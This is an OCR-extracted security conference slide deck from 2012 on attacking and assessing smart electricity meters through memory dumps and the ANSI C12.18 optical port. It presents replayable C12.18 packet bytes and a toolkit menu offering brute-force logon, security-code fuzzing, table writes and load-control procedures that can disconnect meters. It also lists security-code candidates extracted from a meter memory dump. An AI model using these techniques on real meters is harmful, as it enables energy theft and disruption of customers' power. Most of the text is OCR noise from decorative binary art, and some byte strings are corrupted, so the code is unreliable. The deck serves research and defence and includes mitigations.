Looking Into The Eye Of The Meter Don C. Weber InGuardians, Inc. Cutaway and InGuardians 000G01 OOOllOl 010100101 on ooiiinoiiiooiooioo 100101 001110111001000111101111 00 1 100000 1010011110001111110011100110100001100 10000 1 100 110001000 1OOO0OO 101101001111 lOOOO 1 100 10 10 1000 110110 0111G111O1G10O1GG10O0G11O0O11011O1101O01111O 000 1 10 10 10 1 1 1 100 1 1 1 1 1 100000 1 1 10 100 1 1 1 100 100000 11011010000001001010011101111001111010 111010101001111111111110100011001011110 1 010101111011 1001101011111 001 11 10 1 110 100 1 1 1OOO0OGOOOO 10 100 IO 1 1 10 100 10 lOO 10 1 1 100 10 1 10 1 lOOO 1 10 10 11 1 1 1 10 1 1000 1 1000 100 100 100 10 1 11 mi loool noioionoieiooooioonoi 100 lOOOO 111O1O00O10111 1100000 100 1 OG 10GG 1 1G0 GO 10 1GGGGG 10 1GG 1 10 1 1 10G 10110001101100101001000011101 uooooiiiooioooioooiioiiiiooiooiioooioooiiiii 10111110111101100010011011001 1 1000 100 100 100 10 100 1 1 1 1 1 1 OOllGlOOOllGOOlOllOllllGllOllGlOlOllllOllGllllOllOOlGO GO 1 100 1011 100 10 10 100 10 100 1 GlGllOOOll 10101000001011110001010 100100011111111110111110100001010011010100010100000110111011001 000110011010111111 G11GG GGG 1GG 1 10 1 1 1G 1 1 1GGG 1G 10 1GGG 1 1 10 1 010111001110110 0111 1 1 100100 10 1 10 10 10 1 1G 1 1 1 1 11101111101010111010 1001100110000101011001111111001010 1000000100110011001110001100100 noinionoion G011G GO 10 11000 100 01100 00 10 1 100 10 10 10 10000 1 10 1 10 10 1 1 1 10 100 1 100 1 UO 10000 10 111001 10G 100 1 1 1G00 1 1000 1 10 100 10G 100 10G 1 10 100G0U 1 100 10G0 100 1 1 1 1000 looooioiiino gig nana liailBBOOlQlQllllllOBll 0101100000111101 110001110001100010111000100 110101110011001011010111111 0001101100110111 0010011101001 111101010110 10 1 10 1000 111100 10 10 1 10 0000100000111 010100111010011111111110101 11001101111101101111101010 1111000101001 110000111101 11100101110 11101110011111001010110 OllllOllOlll 1010001011011110111101001101 OOOOlOllllll OlllllllOlOlllOOlOOOOOOllOOll OQllOlOlOllll 1111011101 OG 10110001001000010110101 0100101111 10000010000011111100000000011 GO llOO 11 100 110 10 11 10010010011001101000010110101 OlOOlOOOOO 110001010 01110011101011011000110 111100110 00100100100111000100110111110 11111111010110111011 000111100100001100110000000011 001000100 GOG 00 1100 no 110OO 10000 10G0 11 11101010 001110110011111111001001011101 0100010110100100111011 000111100011001111000010111001 11001100 110 01 0011001010000000011100101 oinoo 110100110110010010110101101100 011101010100111010011001 010001011100110111011001001000 00110 1GG1 1111010 OO 100 1 10 100 1000 10 1 IO 100 GOlll llllllOOOlllOllllllOOOOllOOllOll 00010010101011000000011101 00000111100011000001101110010101 OOGGG GO 10 1001 11 100110011011 llOlllOlOO O11O0OO1OO1 11111 1011 1G 10 10 10 101101 1G00 1GG 1 100GG 11011 G 1 1 1GG 1 1G 1 1 10 1 10GGG 10GGG0 1001111 0000 10 1111100100110 OOllllOlllOOOO 100001 10OO1O1 0101 01110110100101000111000101111110 00111001001001110010110001110110 1010 100111 00110000111110 10101 110 110 10 1000 010101111 1 1 1 10000 1100 11 10 1 10 10000 1 1000 10 100 GO 10 11 1 10 10 100 1 1 100 1GG 10 1000 1 1 1 010 1101111 '0000010111111 0GG11 0G1GG0 1000010110001100 10 100000 100GGG 1011101111 1G000G 1 1 10 1 10G 1 1 1 1 100 1G 1 1 1 1 10 10GGG00 1 OO 1111111111100 10000100010110 G1G001 01101 00 11 1000 11 11101 Ol 1 10G0000 1GG000 1 1G 1 1000G 1 1 10 1 Oil 1000 1 1 10000 1 10000 101101 10 100GG 10 110110G10001G101G1010G001G110 01 1101110 110G0G0C I mi ooioooo noooi oog 11100011000110011 1 1GG 10000 10 10 1 100 1 1G 10 10 1G0GG 0011010110G00111010001G0100G11000G1010 101011111G01010G100001G0000 1110001000 000010011 011 1010000110111 10011 1 11011000 oo 0001 1 GO 1 10 1 1 1G0GGGGGG 1GG 1 1 10 1G 10 00 1GGGGG 10 10 1GG 1 1 1G 1 1 1GG 1G 1GGGG 1 1 1 1 1 1 10 1G0 1111111G1G1 10GGGG 11111 10GGG 111101011110 GOGC I1100 011000101000 100 HOG 1 10 11110101 1 111100 1G1011G10111G11G1GGGG001G GO 10 1GG 1 1G 1 1G 1 1000GG 1 1 10GG 1 1 1 1 1 1G 10 1 1 1 10 10GG GO 1 1G 1G0 1 1 1 1G 1G000G 1 1 1 1 1G 1001000101011 11101111 oooooioiiiioooioooo 111000 ''lioini 1111 GGO 1GG 11 110 1GG00G 1G 11 1GG 1G 10 1100 110 1 10 1100 10 1G 11 1GG 100GG 1G 10GGGG00 1GGG0 G 10011 1G00GG 1 1 1 1GGGG00GG 1110011000001 1000000111000 110000000111011001 10000 11100111 no GG001GGG01G1G100GGGG11 10GG011110G1100G01001G100011010G001G01001G11111100 OOGGGG HOGG 110 1110 1101 011111100 110110 0001 01100100011011010000001110000110000011111011 110 10101101 10 100 1G 10 10 10 1G 1 10 1 1 1 1 GO 1 10 1G 10 1G 10G 10G 1110 1GG 1 10 1 1G 1 1GG0GGGG 10 1GG 1GG 1 1G 10 1 1 OOGGG 1G0GG0 1G 10 1 1 10 1 1 OG 0101100011 100010110111000 100 10 1 1 10000 1000 1 1 100 100 1000000 1 10 10 10 110 Olll 111 111101G0111G11100G1 10 1000 110000 1G 10 100 10 GOO 1 10 1 1G0GG 10 10 1GG 1 1G 10 1 1 1GGG OG 10 1 1G0G0 1 1 1 1 1 10 1G oi e« loo io ii loi oe 111110100111110 080 1111110111111 100 11110111111 100 1 10 1 I 101 00 1 J1100G1G110G11G111G 111011 GG1G11GGG1 011111011000111110 1101Q1G G1111GG11011GG1111 Oil 111001110 1 10000 1 10 1 1 1 10000 10 1 1 100 10 100 1 100 1 1000 1 1 100 1 1 10 1000 1 10 10 1 O GOlll 1 lllOlllGOOGGllll 11110 110 1O1O1O101110 OlllllOlOOlOOlOOOlOlOOl 000110 0100000110111001 1 0111 1011 100101100 00 "'1011110001000101101000000111111011000 01100 1 100000011101100 01000 110 10 1000000 110 1100 10 111 OlOllGOlOlll 01 101001 011000010100001 1 00111 100100010110100111101011011011110111111 00 0» 001101111000100' 11110 011001101001011100 010011111 10100 1110011010101100 00 on mi 1011000111010011 010111000001010001 01 00 0110011100001111 1010000 -'110000000011111100011 1100010111 1010100 0O11O1O1O11O11OO 11 10 0101111011011 1000 10 1000 1 1000 10 1 100 ioo oioioonoinooiioi 01001010000000101101000101111100101010000000110010100100 OlllllOOOOOlOlllll 111 000 1 IO 1 100 1 100 1000 100011101 10GG 1 10G 1 lei 011011100101100100 0110101001011100010010001011010011010011101010011010 OO01OO1O1OO1O1O11O OOO 111 110000111011101111101 nil 1000101101011000001 1111000010001111111111101011101110111000010111000 1001000100001000001 1110 001011100000100110010111111111 10100101110 11000 00010110111111011011 1000000000000000011010101111101011001011010111 11111001000111111101 00101 1 110010 110 11 11 0100101000111000 00 10 110 1100 110 11000G noinooiinnoiGiG 10010000011101100011101110000101101011011111 0101001110010011000 oooooi 01 100 1G00 1 1 1000 1101100011011111 100 1 1 1 100000 GG1011G 11GGG111G11G011GGG01 10 1 10000G 1 10000G 1 1 1 100 1 10000 1 1 1 10 1 10000 111GGG00G11101111G10 GG11GG1 "11 L 00 1100G0 100 1100 110 10 11 11000 10 1110 1000 1100 no 11 100 0111 1O0O0O00 1 1 io loo no oo noioi loooo 10001111011 111001 1001000000111100001010 0100 001 100011100 1GG001111110101G000 1GGG000G 100 1 1 1 1 1 1 10 1 10 1 100G 1 1 100GG00 00111 100 1000 1G 10 1 10G 1 101101011 11G1010G01 11011111 1G0GGGG 100 10 1GGG 1GGG 1GG 1 1 1 100 1 1 1G 1 1G 1GGG 1 10 10 1 1 1 1 1 10 1 10 10GGGG 1 1GG0 101G01010G 111111111011 1 1 1GGGG00 1 1G 1GG0 1111 1G 1 1 1 1 1 1 1GG 1 1 10G0 10 0111G11000G1 000000011 0010011011100100 11011100111101010000 10001101 GGG01GGG1001G1 10 1 1 1 1G 1 10 1 1 10 1 10 10 101G0101GGG11111100 llGlOGlll G1011 1100000011 1001111000001111 11011111011111001 1111110 1GG01G11G10G1GG 11101G1G01G110G00 100G11111G1111001 1GG110111G1 GIOOO 100O1O111OO 1O01O111111O1OO01 11GQQ01111111G1G 1 10 1GGG 110000 10000 1 1000 1 1 10 000 110 11 10 11 10 11 OOO 1 10 10GGGG 11 1G 10 11 10 10 10 1 10 1 10 1 1 1 OG 1 1G00 10G 10 1 100 1 10G0 10 1 1 000 100 1 1 io nooi loo no loooiumi in nn oonooinoooo 11101 100 100 1 100 10000 1 IO 1 10 1000 100 1 11 100 1G 1 1 1000 1OO011G1100011 lOOO loooo liooiGin loooo loooo io i no i io looo 1 1 1 no io io llOO i loooo 1 11OO0OG n io io io i io 0011010111011 1000 1 01101111101011011001 1101011000101110000110011111000000100001100111101001000011101010110011 00111111101011010000 01010011110000001111010 1000001011001100000111110110110111111111101100001111001100011001 -0010111011101010000111 010 GOG 01001011001000011111010010 111110001111100010101010101110111011010101110100110001 G01111GG1G10G110110100101G 11011110100100000100001010010 111111100101100000111010010000101100110100010- lOOO 1100 11 10 lOOOOO 1 10 IO 10 10 1 1G0G 1 0011100 100010010011 100 10101010100010 10010 110010100111011101100101001001111 011010100001001001110001001011 101000011110100001110111100011101 OQG 11 1000 101 -O1OOO0 10 10 J 0110 1011 00000000101000001011000010110010010011 11010100111000110001111111011011000001 OOOlOlllOlOOll oooionoin 1O101G1GO0011O100OG1111O11101O11O1011GGO0O11 10 1 10 1G 1 10 1GG 10 1GGG 1 1 1GG 1 10 1 1 1G 1000G 1 10GGG 1 11O11OOOO0101 loi-:: G 1 1 1 1GG 1 10 100G 10000 1 1 1GGG0 1111 1G00 10GG00 1 1G0G0G 1GG 100 1 110G11011GGG0111G01G1G1111010100GG11G11001G010110 11011 http://www.linkedin.com/in/cutaway http://inguardians.com/info Copyright 2012 InGuardians, Inc. Smart Meter Research Findings REDACTED Copyright 2012 InGuardians, Inc. Research Disclaimer • Yes, I conduct assessments on AMI components • No, I will not tell you for which clients • No, I will not tell you which vendor products I have analyzed • Yes, many of these images are generic Danger Electrocution I am not responsible for your actions. InGuardians, Inc. is not responsible for your actions. Random Image Taken From: http://www.flickr.com/photos/lwr/132854217/ Permission-based Research / Penetration Testing Unauthorized Testing Is Illegal EVEN IF THE METER IS ON YOUR HOUSE . Getting Permission For Research IS NOT IMPOSSIBLE. Contact Vendors. I am not responsible for your actions. InGuardians, Inc. is not responsible for your actions. Agenda Purpose Smart Meters Criminals and Smart Meters Attack/Assessment Optical Tool Mitigations Purpose: Presentation and Toolkit • Smart Meter data acquisition techniques have been known since January 5, 2009 - Advanced Metering Infrastructure Attack Methodology [1] - Some vendors/utilities/people/teams are still not aware • Tools to: -Test functionality -Validate configuration - Generate anomalous data What Criminals Can Attack • Access and change data on meter • Gain access to wireless communications • Subvert field hardware to impact internal resources Criminal • Free or Reduced Energy < • Corporate Espionage • Access To Back-End Resources • Non-Kinetic Attack • Hacktivism Copyright 2012 InGuardians, Inc. HAS ALREADY OCCURRED VIA OPTICAL PORT Aggregator On Poletop Copyright 2012 InGuardians, Inc. Only One Winks At You Where To Start? Steal This? State of Texas: Class B Misdemeanor Theft - $50 to $500 Jail <180 Days and/or Fine <$2000 Meter near my barber shop. The exposed contacts scared Copyright 2012 InGuardians, Inc. Components and Interaction DANGER! ! ! ^^^^^^^^^ Data At Rest - Microcontrollers - Memory . - Radios 7 Data In Motion - MCU to Radio - MCU to MCU - MCU to Memory - Board to Board - IR to MCU Image Take From: http://www.ifeitxonVTeardowiVXXXXXXX-Smart-Meter-Teardown/5710/l Data SPI/PC Serial/ Parallel EEPROM - PDIP/SOIJ/SOIC 1 1 8 ^VCC A1£^ 2 7 3 6 ^SCL 4 5 ^SDA Copyright 2012 InGuardians, Inc. Rest NAND/NOR/NVRAM/SRAM/ CellularRAM/PSRAM/SuperFlash/ DataFlash - BGA/FBGA/VFBGA Total Phase Aardvark Flash Utility Copyright 2012 InGuardians, Inc. iping Memory Xeltek SuperPro 5000 plus Adapter Custom Extractors Memory • Data Storage Standards - C12.19 Tables in Transit • Standard Tables - formatted and documented • Manufacturer Tables - formatted but not externally documented - Custom • Obfuscated Information and Tables • Extended memory for firmware • SWAP Space Copyright 2012 InGuardians, Inc. special_rneter.bin - Okteta File Edit View Windows Bookmarks Tools Settings Help New tf Open [— j Save Save As special_nieter.bin Q 0000: 0000: 0000: 0000: 0000: 0000: 0000: 0000: 0000 ^00 51 52 00 00 00 51 52 00 00 00 00 51 52 00 0010 0020 0030 0040 0050 0060 0070 00 00 00 00 01 BG 06 56 00 00 00 00 OF 51 00 00 00 00 00 00 FFFFFFFF 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 07 17 09 FF70 1A FF 00 00 00 00 00 00 00 00 00 0B 00 00 00 00 00 E2 00 9C 86 3E 00 00 00 00 00 01 6E 14 00 00 00 00 00 00 00 00 03 00 00 00 48 B7 91 00 93 58 84 00 00 FF FF FF 00 24 59 00 62 FD Offset: 0000:0000 Selection: ANSI C12.19-2008 American National Standard For Utility Industry End Device Data Tables Data In Motion Random image take from some random Internet site Copyright 2012 InGuardians, Inc. Data Eavesdropping - Step On£ Data Eavesd Persistent tapping by soldering leads to components Provides consistent monitoring for research and development ANSI C12 Communication Protocols C12.21: Is Worse - ansi C12.18-2006 because people think it is "secure" American National Standard Protocol Specification for ANSI ^ Type 2 Optical Port **' ANSI C12. 21-2006 C12.18: Is Okay - because you know what you are getting. American National Standard Protocol Specification for Telephone Modem Co mmuni c a tio n Pelican Naridri, ANSI C12.22-2008 American National Standard Protocol Specification For Interfacing to Data Communication Networks C12.22: ANSI committee has stated vendors should be implementing this Copyright 2012 InGuardians, Inc. Logic Analyzer - Async Serial C12.21 Identification Service Response Packet Analyzers can decode digital signal Export data to CSV formatted files End-of-list Standard 0x00 ==C12.18 0x02 ==C12.21 Version Revision Copyright 2012 InGuardians, Inc. C12.18 Packet Basics CI 2.21 Identification Service Request Packet 4 5 8 10 Time [s] I Value j Direction I Field 70.635036|0xEE !Metro-RXD0 jstp J^^mm |Mel:ro^D0!ide"nt ^^'38^6^0x00 I'M et ro-RXD ] S eg-nbr^ 70"639203|0x00 !Metm-i^D0!le"n0 Z ^^40^510x01 | M et ro -TOD Me n 1 70^i286|0x20 jfii^ f^M23mm2 !Mel:ro^D0!crc0 716433710x70 1 M et r^raDO ] c rc 1 Start packet character Identity Control Field Sequence Number Length Data - Identification Service CCITT CRC Copyright 2012 InGuardians, Inc. C12.18 iQLf | Hon Inse Pag Forr Dat Revi | Vie\ ? O □ ^ £3 D19 * V A B | C D 1 Time [s] Value | Direction Field Notes n Z ~3~ 7fl GT^mTi- OxEE ; Metro-RXDO =tP 0x00 iMetro-RXDO ident 4 7fl K-'^ • • iU.dj / lid 0x20 !Metro : RXD0' cntl"' D r U . o »j a 0x00 : Metro-RXDO Seq-nbr C o / U.bo : i . •_• 0x00 iMetro-RXDO lenO 7 70.640245 0x0 1" iMetro-RXDO len1 .... ........ g 70 641286 0x20 iMetro-RXDO identify / U.b4z jZ .: 0x82 iMetro-RXDO crcO 10 ' 70.6433 7 0x70 IMetro-RXDO cicl 11 70"6Sf8406 0x06 ilnG-TXDO ack /U./i b oZ OxEE. ilnG-TXDO stp 13 IlP;728??5 0x00' "ilnG-TXDO " ident 14 15 0x20 ilnG-TXDO cntl 70.73::-' 0x00 ilnG-TXDO Seq-nbr 16 " 70.73 ; 3c 2 0x00 ilnG-TXDO lenO 17 70732895 0x05 ilnG-TXDO Ien1 18 7C 733937 0x00 ilnG-TXDO ok 19 7073498 0x00 ilnG-TXDO I I 20 21 70736022 0x01 ilnG-TXDO 70.737065 0x00 ilnG-TXDO 22 23 7073810" 0x00 ilnG-TXDO 70.73915 OxFF ilnG-TXDO crcO 24 70.740192 0x42 ilnG-TXDO CI c 1 25 70.78:::::- 0x06 Metro-RXDOiack 2G 27 70.790667 70791709 OxEE iMetro-RXDO istp 0x0 : M etrc-RXEK) | id e nt 23 29 30 70792751 :••■:: r.letro-RXDO icnti 70 793793 70794835 u uu Metro-RXDO Seq-nbr 0x00 j Met ro : RXD0| lenO 31 70795876 0x05 iMetro-RXDO lien 1 32 33 70.796918 m79796 :61 Metro-RXDO i negotiate 0x0l' ]MelJo4^|'^'^^^' ' 34 70799661 0x00 iMetro-RXDO; H i ► h com bine en \ 1 Ready igOH 100% © g ® :i Copyright 2012 InGuardians, Inc. Basics C12.18 Request/Response Pattern - Identification - Negotiation - Logon - Security - Action (Read, Write,/^T^ Procedure) - Logoff j - Terminate ▼ CSV Parser Functionality trunk : bash V , X File Edit View Bookmarks Settings Help cutawa Usage: c y> python cl2 IB _csv parser. py -h cl2_18_csv_parser.py -rxd -txd [-h] [-m] [-0 ] -h -> Enable Help mode -rxd -> A CSV file that contains the response portion of data transmission -txd -> A CSV file that contains the request portion of data transmission -m -> Generate an output file that is marked according to the ANSI C12.18 standard. This output may fail if the file contains errors -0 -> Name of the output files. This will be renamed to contain the date and time to make the file unique. The filename will also be marked with COMBO for a normal combined output and COMBO -MARKED for the file marked according to the ANSI C12.1B standard. This program is designed to parse CSV data from a Saleae Logic Analyzer. The input files should contain the hex byte output from the Async-Serial analyzer. This data should follow the ANSI C12.1B packet structure. This tool will generate a combined CSV file that has been sorted. If specified, the tool will also mark the bytes according to the ANSI C12.1B standard. cutaway> | p trunk r bash Copyright 2012 InGuardians, Inc. Replay Tables To Talk To Tables File Edit View Bookmarks Settings Help clZ 18 fuzz client .py cl2_18_packet . py S Requests ident = [ 1 \xee\x00\x00\x00\x00\x01\x20\xl0\xl3 1 , 1 \xee\x00\x20\x00\x00\x01\x20\x82\x7O 1 ] nego = [ 1 \xee\xQG\x00\x00\x00\x05\x61\x01\x00\x01\x06\xb8\x25 1 , ' \xee\x00\x20\x00\x00\x05\x61\x01\x00\x01\x06\x81\xd2 1 ] logoff = [ 1 \xee\xQ0\x00\x00\x00\x01\x52\x86\x40 1 , 1 \xee\x00\x20\x00\x00\x01\x52\xl7\x20 1 ] # Responses ident r= [ 1 \xee\x00\x00\x00\x00\x05\x00\x00\x01\x00\x00\xc6\xb5 1 , 1 \xee\x00\x20\x00\x00\x05\x00\x00\x01\x00\x00\xff\x42 1 ] nego_r = [ "\xee\x00\x00\x00\x00\x05\x00\x01\x00\x01\x06\x4f\x8f 1 , "\xee\x00\x20\x00\x00\x05\x00\x01\x00\x01\x06\x76\x78" ] ok r = [ 1 \xee\x00\x00\x00\xBB\xBl\xBB\xll\x31" , ' \xee\x00\x20\x00\x00\x01\x00\x80\x51 ' ] errr = [ 1 \xee\x00\x00\xBB\xBB\xBl\xBl\x98\x26 1 , 1 \xee\x00\x20\x00\x00\x01\x01\x09\x40 1 ] snsr = ['\xee\x00\x00\x00\x00\x01\x02\x03\xl2', '\xee\x00\x20\x00\x00\x01\x02\x92\x72'] isc_r = [ , \xee\x00\x00\x00\x00\x01\x03\x8a\x93" , , \xee\x00\x20\x00\x00\x01\x03\xlb\x63' ] onpr = [ 1 \xee\x00\x00\x00\x00\x01\x04\x35\x77 1 , 1 \xee\x00\x20\x00\x00\x01\x04\xa4\xl7 1 ] iarr = [ , \xee\x00\x00\x00\x00\x01\x05\xbc\x66" , , \xee\x00\x20\x00\x00\x01\x05\x2d\x06' ] bsy r = 1 1 \xee\x00\x00\x00\x00\x01\x06\x27\x54' , 1 \xee\x00\x20\x00\x00\x01\x06\xb6\x34' ] dnr r = [ ' \xee\x00\x00\x00\x00\x01\x07\xae\x45 ' , '\xee\x00\x20\x00\x00\x01\x07\x3f\x25' ] dlkr = ['\xee\x00\x00\x00\x00\x01\x08\x59\xbd' , '\xee\x00\x20\x00\x00\x01\x08\xc8\xdd'] rnor = [ ' \xee\x00\x00\x00\x00\x01\x09\xd0\xac ' , '\xee\x00\x20\x00\x00\x01\x09\x41\xcc' ] isssr = [ ' \xee\x00\x00\x00\x00\x01\x0a\x4b\x9e ' , '\xee\x00\x20\x00\x00\x01\x0a\xda\xfe' ] # Wait can be sent as a requestor or a responder wait = [ \ [ 1 \xee\x00\x00\x00\x00\x02\x70\x01\x68\xff 1 , 1 \xee\x00\x20\x00\x00\x02\x70\x01\x08\x7a 1 ] , \ [ 1 \xee\x00\x00\x00\x00\x02\x70\x02\xf 3\xcd 1 , 1 \xee\x00\x20\x00\x00\x02\x70\x02\x93\x48 1 ] , \ [ 1 \xee\x00\x00\x00\x00\x02\x70\x03\x7a\xdc 1 , 1 \xee\x00\x20\x00\x00\x02\x70\x03\xla\x59 1 ] , \ [ 1 \xee\x00\x00\x00\x00\x02\x70\x04\xc5\xa8 1 , 1 \xee\x00\x20\x00\x00\x02\x70\x04\xa5\x2d 1 ] \ ] term = [ '\xee\x00\x00\x00\x00\x01\x21\x9a\x01' f '\xee\x00\x20\x00\x00\x01\x21\x0b\x61' ] ######* *********** *###### # Unknown Sequences # Two versions are provided to handle different control bytes # CNTL Byte needs to alternate logonreqnames = [ 1 Identification 1 , 1 Negotiation 1 , 1 Logon 1 , 1 Security" ] logon_req_seq = [ [ident [B] P nego[l] P logon [B] , security [1] ] , [ident [1] P nego[B] r logon [1] , security [B] logonresp names = ['ID Response" P "Nego Response" , "BK" , "OK" ] logon_resp_seq = [ [ident_r[B] P nego_r[l] p ok_r[B] ,ok_r[l] ] , [ident_r[l] P nego_r[B] p ok_r[l] p ok_r[B] ] ] ■ memory_dump : vim trunk : vim ■ memory_dump : bash Copyright 2012 InGuardians, Inc. Advanced Persistent Tether Copyright 2012 InGuardians, Inc. Serial Transmitter - Receive possible Replay C12.18 Packets C12.19 Table Interaction - Read Tables - Write Tables - Run Procedures Receive Responses via Logical Analyzer Parse Responses by Hand Hardware Client Functionality |H| trunk: bash <2> File Edit View Bookmarks Settings Help cutaway> python c 12_18_hw_client . py -h Usage: cl2_18_hw_client .py [-h] [-D] [-P ] [-f ] [-no] -a [-t ] [-d ] [-p ] [-s ] [-lp ] -h: print help -D: turn on debugging statements -P : Start pause seconds -a : Perform specific action: test_login read_table: requires -t and table number or defaults to a read_decade: requires -d and decade number or defaults to runproc: requires -p and procedure number or defaults to -f : select configuration file -t : table number -d : decade number -p : procedure number -s : data for sending -lp : comma separated list of procedure numbers -no: turn off negotiation attempts NOTE: This tool is fire and forget. You will need to monitor the hardware lines with a logic analyzer to determine success and failure or to read data. Copyright 2012 InGuardians, Inc. Wink! Wink! Wink! Wink! Lean In For A Closer Look ANSI Type 2 Optical Port: Not Your Typical Infra-red Port Remote Control Devices Provides /dev/ttyUSBO via FTDI chip Open Source Optical Probe? I guanaWork s Gainesville, Florida http ://iguanaworks .net/ What Do We Need To Do This?® • Serial Transceiver Driver • C12.18 Packet Driver • C12.18 Client -Reads and parses C12.19 Tables -Writes to C12.19 Tables -Runs C12.19 Procedures -Easy Function Updates -Easy Access To All Functions OptiGuard ( A Smart Meter Assessment Toolkit Copyright 2012 InGuardians, Inc. Permission-based Research / Penetration Testing Unauthorized Testing Is Illegal EVEN IF THE METER IS ON YOUR HOUSE . Getting Permission For Research IS NOT IMPOSSIBLE. Contact Vendors. I am not responsible for your actions. InGuardians, Inc. is not responsible for your actions. OptiGuai IMI trunk: python File Edit View Bookmarks Settings Help cutaway> python cl2_18_optical_client . py ## C12.18 Optical Client - InGuardians , Inc. ## Please review license and Terms of Use before using this software. ############################################################ Start Time: 00:50:36 12/28/11 CST ########################################## ## O) Quit ## 1) Test Negotiation Sequence ## 2) Test Logon ## 3) Parse Configuration Table ## 4) Parse General Manufacturer Identification Table ## 5) Read Table ## 6) Read Multiple Tables ## 7) Read Decade ## 8) Run Procedure ## 9) Run Multiple Procedures ## 10) Run Multiple Procedures without login ## 11) Write Table ## 12) Brute Force Logon ## 13) Alternate Brute Force Logon (Read Table Verification) ## 14) Fuzz Security code ## 15) Alternate Fuzz Security code ## 16) Walk User IDs ## 17) Read Single Table walking User IDs ## 18) Read Multiple Table walking User IDs ## 19) Write Table 13 Demand Control Table. Table write Proof of Concept on ## 20) Run Procedure 21 Direct Load Control and set O percent load ## 21) Run Procedure 21 Direct Load Control and set 100 percent load ## 22) Toggle Debug ## 23) Terminate Session ########################################## Enter Action Selection; I trunk : python trunk : bash trunk : vim Copyright 2012 InGuardians, Inc. Menu Notes - Requires a VALID C12.18 Security Code to modify tables or run procedures - Currently only works with some meters - Vendor specific functions may be required - C12.18 functions are coded for easy implementation and modification - Optical transfer is finicky and fuzzing / brute forcing is hit or miss and must be monitored - Brute force procedure runs have been known to disconnect/connect meters - Brute force procedure runs have been known to brick meters Using The Eye Chart File Edit View Bookmarks Settings Help cutaways* python extract_cl218_seccode.py -b -f special_meter.bin -st 4 -sp 23 > meter_brute_file.txt cutaway> wc -I meter_brute_file.txt 12277 meter_brute_file.txt cutaway> head meter_brute_file.txt 0000010000202020202020202020202020202020 0000010020202020202020202020202020202020 0000012000000120202020202020202020202020 00000120000001203C0000202020202020202020 00000120000001203C0020202020202020202020 00000120000001203C2020202020202020202020 0000012000002020202020202020202020202020 0000012000202020202020202020202020202020 0000012020202020202020202020202020202020 0000012022202020202020202020202020202020 cutaway> | V HI memory_dump:vim H Electrfc_Meters : bash H memory_dump : bash Can check one code ~ every 2 seconds 12277 x 2 seconds = 409 minutes = 6.8 hours Hmmm, are failed logons logged? Does the meter return an error after N attempts Copyright 2012 InGuardians, Inc. Open Wide for a Deep Look Inside Random Image Taken From: http://www.gonemoviesxom/www/Hoo Copyright 2012 InGuardians, Inc. Mitigations - General • Residential meters on businesses -Evaluate for increased risk to client • Limit Shared Security Codes -Difficult to implement a single security per meter -Can vary in numerous ways: • Vendor • Commercial and Residential meter • Zip Code Mitigations - General (2) • Incident Response Planning -Prioritize Critical Field Assets -Incident Response Plan and Training • Employee Training -Identify - Report - Respond Copyright 2012 InGuardians, Inc. 40 Mitigations - Physical • Tamper Alerts -May seem overwhelming, initially -Experience will identify correlating data to escalate appropriately • Toggle Optical Port - Use a switch that activates optical interface - Should generate a tamper alert Copyright 2012 InGuardians, Inc. Mitigations - Data At Rest • Secure Data Storage - Encryption <- must be implemented properly - Hashes <- must be implemented properly • Configuration Integrity Checks -Vendor Specific -Some solutions systems already do this -Meters should function with old configuration until approved / denied Mitigations - Data In Motion • IR Interaction Authorization Tokens -Breaking or Augmenting Standard? • Microcontroller to -C12.22 -Obfuscated Protocols OptiGuard Offspring? • Wireless Optical Port Readers - Small cheap magnetic devices activated wirelessly • Optical Port Spraying - IR interaction without touching meter • Wireless Hardware Sniffers/MITM - Detect updates and modify data in transit • Neighborhood Area Network FHSS Eavesdropping - Channels, Spacing, Modulation, Sync Bytes, Etc Copyright 2012 InGuardians, Inc. Vendor Participation • The following people helped out in various important ways during this journey. -Ed Beroset, Elster - Robert Former, Itron - Others who have asked not to be named Copyright 2012 InGuardians, Inc. Those Who Gretchen, Garrison, and Collier Weber Andrew Righter Atlas Daniel Thanos John Sawyer Copyright 2012 InGuardians, Inc. Be Thanked Joshua Wright Matt Carpenter Tom Liston Travis Goodspeed InGuardians consulting@inguardians.com Tell Them Cutaway Sent You OGlGllGGGll 01G 11 1GB 11 101 18 OOIQIIOOOIOO 1011Q0 ' loeooioiiiiioo oioiiono : GG10G111G1GG1 111101010110 11DGQG1111D1 11100101110 1111011101 GG 1QQQ1Q10 000 01 0001101 010100101 00 1 1UGB 1 1 1 1 10 1 1 100 100 100 1001G1 0011 10 1 1 100 1000 111101111 1 10 10 1 1 1 10 1 1 1 100 1 10 10 1 1 1 1 1 001 1111101000111 1G 1G IB 1 10 10 1G0GG 100 1 10 1 100 1G0G0 1 1 10 10000 101111 10G000 100 1 001000110 "" 001G1000001G10G11 00 000 100 119111011 1000 10 10 10G0 11101 Gill 1 1 100 100 10 1 10 10 10 1 IS 1 1 1 1 00 10 1 100 10 10 10 10000 1 10 1011000010101111110011 u 10 1 10 1000 111100 10 10 1 10 1 1 10 1 1 100 1 1 1 1 100 10 10 1 10 10 1 1G00 100 1QGQG 1G 1 1G 10 1 Oil 100 1 1 10 10 1 10 1 1000 1 10 00 1100 110 11000 10000 1000 11 110 01 0011001010000000011100101 1GG1 111101 GG 01GG 110 100 ' 1000 10 110 100 101001 11 0110011011 1101110100 0110000100 11111 1101 G111110010B11G 001 11 1G 1110000 10GGG1 1GG010 100111 00110000111110 10 101 110110 10100- 101 111 1101111 10G0GGG 10111111 00011 00 1000 10000 10 11000 HOG 1111111111100 10000100010110 010001 01101 0Q1110QG1111101 high lo l loooooo 1111 oioooo 110001 goo 11100011000110011 111000100G 1000010011 Oil 1Q1000Q11Q111 10011 01 11011000 00 G0G1 111101011110 00G01100 11000101000 100 HOG 1 111010 1110 1001000101011 11101111 00000 1G 11 1100010000 111000 1101111 1111 1110011000001 11000010 10000001110 110000000111011001 10GGG 11 1001 11 110 011111100 11101100001 1 100 1000 1 10 1 10 1000000 1 1 10000 1 100000 1 1 1 1 10 1 1 01 10 LG1011G1 010110001 1000 10 1 10 1 1 1000 1 00 100 10 1 1 10000 1000 1 1 100 100 1000000 1 10 10 10 110 L00G01 111 1111 01 01001011101 0011110100111110100001111110111111100111101111111001101 101 GOGO 11 11001110 1 10000 1 10 1 1 1 10000 1011 100 10 100 1 100 1 1000 1 1 100 1 1 10 1000 1 10 10 00111 Gill 1011 100 10 110000 01011110001000101101000000111111011000 1 100 • 00111 100 1000 10 1 10 100 111101011011011110111111 00 1 11G11G0G111G1G011 010111000001010001 01 10 10 1 1 1 10 1 10 1 1 1000 10 10G0 1 